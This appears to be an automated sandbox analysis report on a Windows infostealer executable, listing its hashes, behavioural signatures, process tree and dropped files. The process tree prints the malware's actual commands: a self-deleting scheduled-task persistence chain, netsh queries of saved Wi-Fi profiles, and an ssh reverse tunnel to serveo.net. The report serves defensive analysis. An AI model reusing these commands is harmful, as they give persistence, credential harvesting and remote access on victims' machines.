Analysis
-
max time kernel
132s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 02:30
Static task
static1
Behavioral task
behavioral1
Sample
e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
Resource
win10v2004-20240426-en
General
-
Target
e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
-
Size
120KB
-
MD5
479d30cd484920e686388641718edc53
-
SHA1
c7040a1893168c204c759280d9671b0b58890c8c
-
SHA256
e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601
-
SHA512
e499941a4f0f0764ab7493f3f7aa588473409881aa4564a9939cfd60232bd1de672ecfc099d6712fa1eb4da272855f92c95fdf610f688c81894a6258cd3dd51d
-
SSDEEP
1536:2Wzd3+6aUp+3aTvjgFnbF/nt6z9b1Caom02vrDxcHtcV/erWEUzny94BgJad:z3av3aTvjv9b1Ch30rDxcHtcV/SquI
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe -
Executes dropped EXE 2 IoCs
Processes:
e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exee4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exepid process 5008 e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe 2980 e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe Key opened \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe Key opened \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 31 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2852 timeout.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exee4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exepid process 5008 e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe 5008 e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe 5008 e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe 5008 e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe 2980 e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exee4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exee4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exedescription pid process Token: SeDebugPrivilege 1340 e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe Token: SeDebugPrivilege 5008 e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe Token: SeDebugPrivilege 2980 e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exee4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exepid process 5008 e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe 2980 e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe -
Suspicious use of WriteProcessMemory 30 IoCs
Processes:
e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.execmd.exee4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.execmd.execmd.exee4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exedescription pid process target process PID 1340 wrote to memory of 4364 1340 e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe cmd.exe PID 1340 wrote to memory of 4364 1340 e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe cmd.exe PID 4364 wrote to memory of 2120 4364 cmd.exe chcp.com PID 4364 wrote to memory of 2120 4364 cmd.exe chcp.com PID 4364 wrote to memory of 2852 4364 cmd.exe timeout.exe PID 4364 wrote to memory of 2852 4364 cmd.exe timeout.exe PID 4364 wrote to memory of 2184 4364 cmd.exe schtasks.exe PID 4364 wrote to memory of 2184 4364 cmd.exe schtasks.exe PID 4364 wrote to memory of 5008 4364 cmd.exe e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe PID 4364 wrote to memory of 5008 4364 cmd.exe e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe PID 5008 wrote to memory of 2280 5008 e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe cmd.exe PID 5008 wrote to memory of 2280 5008 e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe cmd.exe PID 2280 wrote to memory of 2316 2280 cmd.exe chcp.com PID 2280 wrote to memory of 2316 2280 cmd.exe chcp.com PID 2280 wrote to memory of 2028 2280 cmd.exe netsh.exe PID 2280 wrote to memory of 2028 2280 cmd.exe netsh.exe PID 2280 wrote to memory of 3664 2280 cmd.exe findstr.exe PID 2280 wrote to memory of 3664 2280 cmd.exe findstr.exe PID 5008 wrote to memory of 5116 5008 e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe cmd.exe PID 5008 wrote to memory of 5116 5008 e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe cmd.exe PID 5116 wrote to memory of 1428 5116 cmd.exe chcp.com PID 5116 wrote to memory of 1428 5116 cmd.exe chcp.com PID 5116 wrote to memory of 1308 5116 cmd.exe netsh.exe PID 5116 wrote to memory of 1308 5116 cmd.exe netsh.exe PID 5116 wrote to memory of 3956 5116 cmd.exe findstr.exe PID 5116 wrote to memory of 3956 5116 cmd.exe findstr.exe PID 5008 wrote to memory of 4616 5008 e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe ssh.exe PID 5008 wrote to memory of 4616 5008 e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe ssh.exe PID 2980 wrote to memory of 4152 2980 e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe ssh.exe PID 2980 wrote to memory of 4152 2980 e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe ssh.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
Processes:
e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe -
outlook_win_path 1 IoCs
Processes:
e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe"C:\Users\Admin\AppData\Local\Temp\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\RobloxSecurity\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe" &&START "" "C:\Users\Admin\AppData\Local\RobloxSecurity\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650013⤵
-
C:\Windows\system32\timeout.exetimeout /t 33⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\RobloxSecurity\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\RobloxSecurity\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe"C:\Users\Admin\AppData\Local\RobloxSecurity\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe"3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650015⤵
-
C:\Windows\system32\netsh.exenetsh wlan show profiles5⤵
-
C:\Windows\system32\findstr.exefindstr /R /C:"[ ]:[ ]"5⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650015⤵
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid5⤵
-
C:\Windows\system32\findstr.exefindstr "SSID BSSID Signal"5⤵
-
C:\Windows\System32\OpenSSH\ssh.exe"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6240 serveo.net4⤵
-
C:\Users\Admin\AppData\Local\RobloxSecurity\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exeC:\Users\Admin\AppData\Local\RobloxSecurity\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\OpenSSH\ssh.exe"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6240 serveo.net2⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe.logFilesize
847B
MD53308a84a40841fab7dfec198b3c31af7
SHA14e7ab6336c0538be5dd7da529c0265b3b6523083
SHA256169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e
SHA51297521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198
-
C:\Users\Admin\AppData\Local\RobloxSecurity\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exeFilesize
120KB
MD5479d30cd484920e686388641718edc53
SHA1c7040a1893168c204c759280d9671b0b58890c8c
SHA256e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601
SHA512e499941a4f0f0764ab7493f3f7aa588473409881aa4564a9939cfd60232bd1de672ecfc099d6712fa1eb4da272855f92c95fdf610f688c81894a6258cd3dd51d
-
C:\Users\Admin\AppData\Local\lbdd1brp2p\p.datFilesize
4B
MD5405075699f065e43581f27d67bb68478
SHA11a20cf59f0584ada3deeff6c1c5b4c11c691aec0
SHA2567666197a246dded3b8238775f3cedf8350a2858a8117e744a703987dd55aa497
SHA512c5eb5e284710fbc093bb55feae8a6623d0366db40a03cbd399d7173e06641dab84dad3cf5c0dc330b727498688093b9a7fc884f7afbe88c0627f963adc61deb1
-
memory/1340-0-0x00007FFE5FD83000-0x00007FFE5FD85000-memory.dmpFilesize
8KB
-
memory/1340-1-0x0000024C732B0000-0x0000024C732D4000-memory.dmpFilesize
144KB
-
memory/1340-4-0x00007FFE5FD80000-0x00007FFE60841000-memory.dmpFilesize
10.8MB
-
memory/1340-6-0x00007FFE5FD80000-0x00007FFE60841000-memory.dmpFilesize
10.8MB
-
memory/5008-11-0x00007FFE5DDE3000-0x00007FFE5DDE5000-memory.dmpFilesize
8KB
-
memory/5008-16-0x00007FFE5DDE3000-0x00007FFE5DDE5000-memory.dmpFilesize
8KB